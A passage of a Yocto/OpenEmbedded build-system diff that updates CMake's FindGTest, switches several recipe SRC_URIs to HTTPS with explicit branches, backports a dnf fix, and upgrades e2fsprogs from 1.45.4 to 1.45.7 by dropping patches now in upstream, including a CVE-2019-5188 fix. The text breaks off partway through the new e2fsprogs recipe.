if(GTEST_INCLUDE_DIRS) ++ set_target_properties(GTest::gmock PROPERTIES ++ INTERFACE_INCLUDE_DIRECTORIES "${GTEST_INCLUDE_DIRS}") ++ endif() ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "") ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gmock GMOCK_LIBRARY "DEBUG") ++ endif() ++ if(NOT TARGET GTest::gmock_main) ++ __gtest_determine_library_type(GMOCK_MAIN_LIBRARY) ++ add_library(GTest::gmock_main ${GMOCK_MAIN_LIBRARY_TYPE} IMPORTED) ++ set_target_properties(GTest::gmock_main PROPERTIES ++ INTERFACE_LINK_LIBRARIES "GTest::gmock") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "RELEASE") ++ __gtest_import_library(GTest::gmock_main GMOCK_MAIN_LIBRARY "DEBUG") + endif() + endif() +diff --git a/Tests/FindGTest/Test/CMakeLists.txt b/Tests/FindGTest/Test/CMakeLists.txt +index b65b9d28f6..7d3a378a65 100644 +--- a/Tests/FindGTest/Test/CMakeLists.txt ++++ b/Tests/FindGTest/Test/CMakeLists.txt +@@ -12,3 +12,7 @@ add_executable(test_gtest_var main.cxx) + target_include_directories(test_gtest_var PRIVATE ${GTEST_INCLUDE_DIRS}) + target_link_libraries(test_gtest_var PRIVATE ${GTEST_BOTH_LIBRARIES} ${CMAKE_THREAD_LIBS_INIT}) + add_test(NAME test_gtest_var COMMAND test_gtest_var) ++ ++add_executable(test_gmock_tgt main.cxx) ++target_link_libraries(test_gmock_tgt GTest::gmock_main) ++add_test(NAME test_gmock_tgt COMMAND test_gmock_tgt) +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb b/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb index c6a53ffece..3c403a4077 100644 --- a/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb +++ b/poky/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/rpm-software-management/createrepo_c \ +SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \ file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ " diff --git a/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb index 9a36cfe525..2a74a068f1 100644 --- a/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb +++ b/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb @@ -15,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt" RRECOMMENDS_${PN}-server = "avahi-daemon" -SRC_URI = "git://github.com/distcc/distcc.git \ +SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \ file://fix-gnome.patch \ file://separatebuilddir.patch \ file://default \ diff --git a/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch new file mode 100644 index 0000000000..57c2375a54 --- /dev/null +++ b/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch @@ -0,0 +1,60 @@ +From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001 +From: Jaroslav Mracek +Date: Tue, 3 Sep 2019 11:01:51 +0200 +Subject: [PATCH] Keep installed packages in upgrade job + (RhBug:1728252,1644241,1741381) + +In combination with marking of job as TARGETED it prevents from +reinstalling of modified packages with same NEVRA. + +https://bugzilla.redhat.com/show_bug.cgi?id=1728252 +https://bugzilla.redhat.com/show_bug.cgi?id=1644241 +https://bugzilla.redhat.com/show_bug.cgi?id=1741381 + +Closes: #1474 +Approved by: m-blaha + + +Backport to fix bug in dnf in oe-core +from https://github.com/rpm-software-management/dnf + +Removed spec file portion of patch + +Upstream-Status: Backport +Signed-off-by: Jate Sujjavanich +--- + dnf.spec | 4 ++-- + dnf/base.py | 3 --- + dnf/module/module_base.py | 2 +- + 3 files changed, 3 insertions(+), 6 deletions(-) + +diff --git a/dnf/base.py b/dnf/base.py +index b2ced61..628c154 100644 +--- a/dnf/base.py ++++ b/dnf/base.py +@@ -1968,9 +1968,6 @@ class Base(object): + obsoletes=q.installed().union(q.upgrades())) + # add obsoletes into transaction + q = q.union(obsoletes) +- # provide only available packages to solver otherwise selection of available +- # possibilities will be ignored +- q = q.available() + if reponame is not None: + q.filterm(reponame=reponame) + q = self._merge_update_filters(q, pkg_spec=pkg_spec) +diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py +index 976d730..ce70f63 100644 +--- a/dnf/module/module_base.py ++++ b/dnf/module/module_base.py +@@ -214,7 +214,7 @@ class ModuleBase(object): + + if not upgrade_package_set: + logger.error(_("Unable to match profile in argument {}").format(spec)) +- query = self.base.sack.query().available().filterm(name=upgrade_package_set) ++ query = self.base.sack.query().filterm(name=upgrade_package_set) + if query: + sltr = dnf.selector.Selector(self.base.sack) + sltr.set(pkg=query) +-- +2.7.4 + diff --git a/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb index 7831e1ac5a..6b6b233d6d 100644 --- a/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb +++ b/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \ " -SRC_URI = "git://github.com/rpm-software-management/dnf.git \ +SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \ file://0001-Corretly-install-tmpfiles.d-configuration.patch \ file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \ file://0005-Do-not-prepend-installroot-to-logdir.patch \ @@ -16,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \ file://0030-Run-python-scripts-using-env.patch \ file://Fix-SyntaxWarning.patch \ file://0001-set-python-path-for-completion_helper.patch \ + file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \ " SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d" diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc index 009f5ed807..45fb9720ee 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc @@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \ SECTION = "base" DEPENDS = "util-linux attr" -SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git" +SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master" S = "${WORKDIR}/git" inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch deleted file mode 100644 index ba4e3a3c97..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch +++ /dev/null @@ -1,49 +0,0 @@ -From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001 -From: Theodore Ts'o -Date: Thu, 19 Dec 2019 19:45:06 -0500 -Subject: [PATCH] e2fsck: don't try to rehash a deleted directory - -If directory has been deleted in pass1[bcd] processing, then we -shouldn't try to rehash the directory in pass 3a when we try to -rehash/reoptimize directories. - -Signed-off-by: Theodore Ts'o - -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3] -Signed-off-by: Anuj Mittal ---- - e2fsck/pass1b.c | 4 ++++ - e2fsck/rehash.c | 2 ++ - 2 files changed, 6 insertions(+) - -diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c -index 5693b9cf..bca701ca 100644 ---- a/e2fsck/pass1b.c -+++ b/e2fsck/pass1b.c -@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino, - fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx); - if (ctx->inode_bad_map) - ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino); -+ if (ctx->inode_reg_map) -+ ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino); -+ ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino); -+ ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino); - ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode)); - quota_data_sub(ctx->qctx, &dp->inode, ino, - pb.dup_blocks * fs->blocksize); -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index 3dd1e941..2c908be0 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx) - if (!ext2fs_u32_list_iterate(iter, &ino)) - break; - } -+ if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino)) -+ continue; - - pctx.dir = ino; - if (first) { --- -2.24.1 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch deleted file mode 100644 index fc4a540986..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch +++ /dev/null @@ -1,41 +0,0 @@ -From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001 -From: Robert Yang -Date: Wed, 13 Sep 2017 19:55:35 -0700 -Subject: [PATCH] misc/create_inode.c: set dir's mode correctly - -The dir's mode has been set by ext2fs_mkdir() with umask, so -reset it to the source's mode in set_inode_extra(). - -Fixed when source dir's mode is 521, but tarball would be 721, this was -incorrect. - -Upstream-Status: Submitted - -Signed-off-by: Robert Yang ---- - misc/create_inode.c | 9 ++++++++- - 1 file changed, 8 insertions(+), 1 deletion(-) - -diff --git a/misc/create_inode.c b/misc/create_inode.c -index 8ce3faf..50fbaa8 100644 ---- a/misc/create_inode.c -+++ b/misc/create_inode.c -@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino, - - inode.i_uid = st->st_uid; - inode.i_gid = st->st_gid; -- inode.i_mode |= st->st_mode; -+ /* -+ * The dir's mode has been set by ext2fs_mkdir() with umask, so -+ * reset it to the source's mode -+ */ -+ if S_ISDIR(st->st_mode) -+ inode.i_mode = LINUX_S_IFDIR | st->st_mode; -+ else -+ inode.i_mode |= st->st_mode; - inode.i_atime = st->st_atime; - inode.i_mtime = st->st_mtime; - inode.i_ctime = st->st_ctime; --- -2.10.2 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch deleted file mode 100644 index de4bce0037..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch +++ /dev/null @@ -1,57 +0,0 @@ -From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001 -From: Theodore Ts'o -Date: Thu, 19 Dec 2019 19:37:34 -0500 -Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when - rehashing - -In e2fsck pass 3a, when we are rehashing directories, at least in -theory, all of the directories should have had corruptions with -respect to directory entry structure fixed. However, it's possible -(for example, if the user declined a fix) that we can reach this stage -of processing with a corrupted directory entries. - -So check for that case and don't try to process a corrupted directory -block so we don't run into trouble in mutate_name() if there is a -zero-length file name. - -Addresses: TALOS-2019-0973 -Addresses: CVE-2019-5188 -Signed-off-by: Theodore Ts'o - -CVE: CVE-2019-5188 -Signed-off-by: Anuj Mittal -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff] ---- - e2fsck/rehash.c | 9 +++++++++ - 1 file changed, 9 insertions(+) - -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index a5fc1be1..3dd1e941 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs, - dir_offset += rec_len; - if (dirent->inode == 0) - continue; -+ if ((name_len) == 0) { -+ fd->err = EXT2_ET_DIR_CORRUPTED; -+ return BLOCK_ABORT; -+ } - if (!fd->compress && (name_len == 1) && - (dirent->name[0] == '.')) - continue; -@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs, - continue; - } - new_len = ext2fs_dirent_name_len(ent->dir); -+ if (new_len == 0) { -+ /* should never happen */ -+ ext2fs_unmark_valid(fs); -+ continue; -+ } - memcpy(new_name, ent->dir->name, new_len); - mutate_name(new_name, &new_len); - for (j=0; j < fd->num_array; j++) { --- -2.24.1 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch deleted file mode 100644 index 342a2b855b..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch +++ /dev/null @@ -1,76 +0,0 @@ -From: Wang Shilong -Date: Mon, 30 Dec 2019 19:52:39 -0500 -Subject: e2fsck: fix use after free in calculate_tree() - -The problem is alloc_blocks() will call get_next_block() which might -reallocate outdir->buf, and memory address could be changed after -this. To fix this, pointers that point into outdir->buf, such as -int_limit and root need to be recaulated based on the new starting -address of outdir->buf. - -[ Changed to correctly recalculate int_limit, and to optimize how we - reallocate outdir->buf. -TYT ] - -Addresses-Debian-Bug: 948517 -Signed-off-by: Wang Shilong -Signed-off-by: Theodore Ts'o -(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01) - -Signed-off-by: Anuj Mittal -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01] ---- - e2fsck/rehash.c | 17 ++++++++++++++++- - 1 file changed, 16 insertions(+), 1 deletion(-) - -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index 0a5888a9..2574e151 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir, - errcode_t retval; - - if (outdir->num >= outdir->max) { -- retval = alloc_size_dir(fs, outdir, outdir->max + 50); -+ int increment = outdir->max / 10; -+ -+ if (increment < 50) -+ increment = 50; -+ retval = alloc_size_dir(fs, outdir, outdir->max + increment); - if (retval) - return retval; - } -@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs, - if (retval) - return retval; - -+ /* outdir->buf might be reallocated */ -+ *prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset); -+ - *next_ent = set_int_node(fs, block_start); - *limit = (struct ext2_dx_countlimit *)(*next_ent); - if (next_offset) -@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs, - return retval; - } - if (c3 == 0) { -+ int delta1 = (char *)int_limit - outdir->buf; -+ int delta2 = (char *)root - outdir->buf; -+ - retval = alloc_blocks(fs, &limit, &int_ent, - &dx_ent, &int_offset, - NULL, outdir, i, &c2, -@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs, - if (retval) - return retval; - -+ /* outdir->buf might be reallocated */ -+ int_limit = (struct ext2_dx_countlimit *) -+ (outdir->buf + delta1); -+ root = (struct ext2_dx_entry *) -+ (outdir->buf + delta2); - } - dx_ent->block = ext2fs_cpu_to_le32(i); - if (c3 != limit->limit) --- -2.24.1 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch index 4d335af4cf..284ac90196 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch @@ -1,4 +1,4 @@ -From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001 +From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001 From: Jackie Huang Date: Wed, 10 Aug 2016 11:19:44 +0800 Subject: [PATCH] Fix missing check for permission denied. diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch index 95e6a7a2d5..aac88eed98 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch @@ -1,4 +1,4 @@ -From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001 +From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001 From: Ross Burton Date: Mon, 23 Dec 2013 13:38:34 +0000 Subject: [PATCH] e2fsprogs: silence debugfs diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb deleted file mode 100644 index 2eae9cd892..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb +++ /dev/null @@ -1,147 +0,0 @@ -require e2fsprogs.inc - -SRC_URI += "file://remove.ldconfig.call.patch \ - file://run-ptest \ - file://ptest.patch \ - file://mkdir_p.patch \ - file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \ - file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \ - file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \ - file://CVE-2019-5188.patch \ - file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \ - file://e2fsck-fix-use-after-free-in-calculate_tree.patch \ - " - -SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \ - file://quiet-debugfs.patch \ - file://big-inodes-for-small-fs.patch \ -" - -SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac" -UPSTREAM_CHECK_GITTAGREGEX = "v(?P\d+\.\d+(\.\d+)*)$" - -EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \ - --enable-elf-shlibs --disable-libuuid --disable-uuidd \ - --disable-libblkid --enable-verbose-makecmds \ - --with-crond-dir=no" - -EXTRA_OECONF_darwin = "--libdir=${base_libdir} --sbindir=${base_sbindir} --enable-bsd-shlibs" - -PACKAGECONFIG ??= "" -PACKAGECONFIG[fuse] = '--enable-fuse2fs,--disable-fuse2fs,fuse' - -# make locale rules sometimes fire, sometimes don't as git doesn't preserve -# file mktime. Touch the files introducing non-determinism to the build -do_compile_prepend (){ - find ${S}/po -type f -name "*.po" -exec touch {} + -} - -do_install () { - oe_runmake 'DESTDIR=${D}' install - oe_runmake 'DESTDIR=${D}' install-libs - # We use blkid from util-linux now so remove from here - rm -f ${D}${base_libdir}/libblkid* - rm -rf ${D}${includedir}/blkid - rm -f ${D}${base_libdir}/pkgconfig/blkid.pc - rm -f ${D}${base_sbindir}/blkid - rm -f ${D}${base_sbindir}/fsck - rm -f ${D}${base_sbindir}/findfs - - # e2initrd_helper and the pkgconfig files belong in libdir - if [ ! ${D}${libdir} -ef ${D}${base_libdir} ]; then - install -d ${D}${libdir} - mv ${D}${base_libdir}/e2initrd_helper ${D}${libdir} - mv ${D}${base_libdir}/pkgconfig ${D}${libdir} - fi - - oe_multilib_header ext2fs/ext2_types.h - install -d ${D}${base_bindir} - mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs - - install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/ - - # Clean host path (build directory) in compile_et, mk_cmds - sed -i -e "s,\(ET_DIR=.*\)${S}/lib/et\(.*\),\1${datadir}/et\2,g" ${D}${bindir}/compile_et - sed -i -e "s,\(SS_DIR=.*\)${S}/lib/ss\(.*\),\1${datadir}/ss\2,g" ${D}${bindir}/mk_cmds -} - -# Need to find the right mke2fs.conf file -e2fsprogs_conf_fixup () { - for i in mke2fs mkfs.ext2 mkfs.ext3 mkfs.ext4; do - create_wrapper ${D}${base_sbindir}/$i MKE2FS_CONFIG=${sysconfdir}/mke2fs.conf - done -} - -do_install_append_class-native() { - e2fsprogs_conf_fixup -} - -do_install_append_class-nativesdk() { - e2fsprogs_conf_fixup -} - -do_install_append_class-target() { - mv ${D}${base_sbindir}/mke2fs ${D}${base_sbindir}/mke2fs.e2fsprogs - mv ${D}${base_sbindir}/mkfs.ext2 ${D}${base_sbindir}/mkfs.ext2.e2fsprogs - mv ${D}${base_sbindir}/tune2fs ${D}${base_sbindir}/tune2fs.e2fsprogs -} - -RDEPENDS_e2fsprogs = "e2fsprogs-badblocks e2fsprogs-dumpe2fs" -RRECOMMENDS_e2fsprogs = "e2fsprogs-mke2fs e2fsprogs-e2fsck" - -PACKAGES =+ "e2fsprogs-badblocks e2fsprogs-dumpe2fs e2fsprogs-e2fsck e2fsprogs-e2scrub e2fsprogs-mke2fs e2fsprogs-resize2fs e2fsprogs-tune2fs" -PACKAGES =+ "libcomerr libss libe2p libext2fs" - -FILES_e2fsprogs-dumpe2fs = "${base_sbindir}/dumpe2fs" -FILES_e2fsprogs-resize2fs = "${base_sbindir}/resize2fs*" -FILES_e2fsprogs-e2fsck = "${base_sbindir}/e2fsck ${base_sbindir}/fsck.ext*" -FILES_e2fsprogs-e2scrub = "${base_sbindir}/e2scrub*" -FILES_e2fsprogs-mke2fs = "${base_sbindir}/mke2fs.e2fsprogs ${base_sbindir}/mkfs.ext* ${sysconfdir}/mke2fs.conf" -FILES_e2fsprogs-tune2fs = "${base_sbindir}/tune2fs.e2fsprogs ${base_sbindir}/e2label" -FILES_e2fsprogs-badblocks = "${base_sbindir}/badblocks" -FILES_libcomerr = "${base_libdir}/libcom_err.so.*" -FILES_libss = "${base_libdir}/libss.so.*" -FILES_libe2p = "${base_libdir}/libe2p.so.*" -FILES_libext2fs = "${libdir}/e2initrd_helper ${base_libdir}/libext2fs.so.*" -FILES_${PN}-dev += "${datadir}/*/*.awk ${datadir}/*/*.sed ${base_libdir}/*.so ${bindir}/compile_et ${bindir}/mk_cmds" - -ALTERNATIVE_${PN} = "chattr" -ALTERNATIVE_PRIORITY = "100" -ALTERNATIVE_LINK_NAME[chattr] = "${base_bindir}/chattr" -ALTERNATIVE_TARGET[chattr] = "${base_bindir}/chattr.e2fsprogs" - -ALTERNATIVE_${PN}-doc = "fsck.8" -ALTERNATIVE_LINK_NAME[fsck.8] = "${mandir}/man8/fsck.8" - -ALTERNATIVE_${PN}-mke2fs = "mke2fs mkfs.ext2" -ALTERNATIVE_LINK_NAME[mke2fs] = "${base_sbindir}/mke2fs" -ALTERNATIVE_LINK_NAME[mkfs.ext2] = "${base_sbindir}/mkfs.ext2" - -ALTERNATIVE_${PN}-tune2fs = "tune2fs" -ALTERNATIVE_LINK_NAME[tune2fs] = "${base_sbindir}/tune2fs" - -RDEPENDS_e2fsprogs-e2scrub = "bash" -RDEPENDS_${PN}-ptest += "coreutils procps bash bzip2 diffutils perl sed" -RDEPENDS_${PN}-ptest += "e2fsprogs-badblocks e2fsprogs-dumpe2fs e2fsprogs-e2fsck e2fsprogs-mke2fs e2fsprogs-resize2fs e2fsprogs-tune2fs" - -do_compile_ptest() { - oe_runmake -C ${B}/tests -} - -do_install_ptest() { - # This file's permissions depends on the host umask so be deterministic - chmod 0644 ${B}/tests/test_data.tmp - cp -R --no-dereference --preserve=mode,links -v ${B}/tests ${D}${PTEST_PATH}/test - cp -R --no-dereference --preserve=mode,links -v ${S}/tests/* ${D}${PTEST_PATH}/test - sed -e 's!../e2fsck/e2fsck!e2fsck!g' \ - -e 's!../misc/tune2fs!tune2fs!g' -i ${D}${PTEST_PATH}/test/*/expect* - sed -e 's!../e2fsck/e2fsck!${base_sbindir}/e2fsck!g' -i ${D}${PTEST_PATH}/test/*/script - - # Remove various files - find "${D}${PTEST_PATH}" -type f \ - \( -name 'Makefile' -o -name 'Makefile.in' -o -name '*.o' -o -name '*.c' -o -name '*.h' \)\ - -exec rm -f {} + - - install -d ${D}${PTEST_PATH}/lib - install -m 0644 ${B}/lib/config.h ${D}${PTEST_PATH}/lib/ -} diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb new file mode 100644 index 0000000000..3bc530e02b --- /dev/null +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb @@ -0,0 +1,143 @@ +require e2fsprogs.inc + +SRC_URI += "file://remove.ldconfig.call.patch \ + file://run-ptest \ + file://ptest.patch \ + file://mkdir_p.patch \ + file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \ + file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \ + " + +SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \ + file://quiet-debugfs.patch \ + file://big-inodes-for-small-fs.patch \ +" + +SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f" +UPSTREAM_CHECK_GITTAGREGEX = "v(?P\d+\.\d+(\.\d+)*)$" + +EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \ + --enable-elf-shlibs --disable-libuuid --disable-uuidd \ + --disable-libblkid --enable-verbose-makecmds \ + --with-crond-dir=no" + +EXTRA_OECONF_darwin = "--libdir=${base_libdir} --sbindir=${base_sbindir} --enable-bsd-shlibs" + +PACKAGECONFIG ??= "" +PACKAGECONFIG[fuse] = '--enable-fuse2fs,--disable-fuse2fs,fuse' + +# make locale rules sometimes fire, sometimes don't as git doesn't preserve +# file mktime. Touch the files introducing non-determinism to the build +do_compile_prepend (){ + find ${S}/po -type f -name "*.po" -exec touch {} + +} + +do_install () { + oe_runmake 'DESTDIR=${D}' install + oe_runmake 'DESTDIR=${D}' install-libs + # We use blkid from util-linux now so remove from here + rm -f ${D}${base_libdir}/libblkid* + rm -rf ${D}${includedir}/blkid + rm -f ${D}${base_libdir}/pkgconfig/blkid.pc + rm -f ${D}${base_sbindir}/blkid + rm -f ${D}${base_sbindir}/fsck + rm -f ${D}${base_sbindir}/findfs + + # e2initrd_helper and the pkgconfig files belong in libdir + if [ ! ${D}${libdir} -ef ${D}${base_libdir} ]; then + install -d ${D}${libdir} + mv ${D}${base_libdir}/e2initrd_helper ${D}${libdir} + mv ${D}${base_libdir}/pkgconfig ${D}${libdir} + fi + + oe_multilib_header ext2fs/ext2_types.h + install -d ${D}${base_bindir} + mv ${D}${bindir}/chattr ${D}${base_bindir}/chattr.e2fsprogs + + install -v -m 755 ${S}/contrib/populate-extfs.sh ${D}${base_sbindir}/ + + # Clean host path (build directory) in compile_et, mk_cmds + sed -i -e "s,\(ET_DIR=.*\)${S}/lib/et\(.*\),\1${datadir}/et\2,g" ${D}${bindir}/compile_et + sed -i -e "s,\(SS_DIR=.*\)${S}/lib/ss\(.*\),\1${datadir}/ss\2,g" ${D}${bindir}/mk_cmds +} + +# Need to find the right mke2fs.conf file +e2fsprogs_conf_fixup () { + for i in mke2fs mkfs.ext2 mkfs.ext3 mkfs.ext4; do + create_wrapper ${D}${base_sbindir}/$i MKE2FS_CONFIG=${sysconfdir}/mke2fs.conf + done +} + +do_install_append_class-native() { + e2fsprogs_conf_fixup +} + +do_install_append_class-nativesdk() { + e2fsprogs_conf_fixup +} + +do_install_append_class-target() { + mv ${D}${base_sbindir}/mke2fs ${D}${base_sbindir}/mke2fs.e2fsprogs + mv ${D}${base_sbindir}/mkfs.ext2 ${D}${base_sbindir}/mkfs.ext2.e2fsprogs + mv ${D}${base_sbindir}/tune2fs ${D}${base_sbindir}/tune2fs.e2fsprogs +} + +RDEPENDS_e2fsprogs = "e2fsprogs-badblocks e2fsprogs-dumpe2fs" +RRECOMMENDS_e2fsprogs = "e2fsprogs-mke2fs e2fsprogs-e2fsck" + +PACKAGES =+ "e2fsprogs-badblocks e2fsprogs-dumpe2fs e2fsprogs-e2fsck e2fsprogs-e2scrub e2fsprogs-mke2fs e2fsprogs-resize2fs 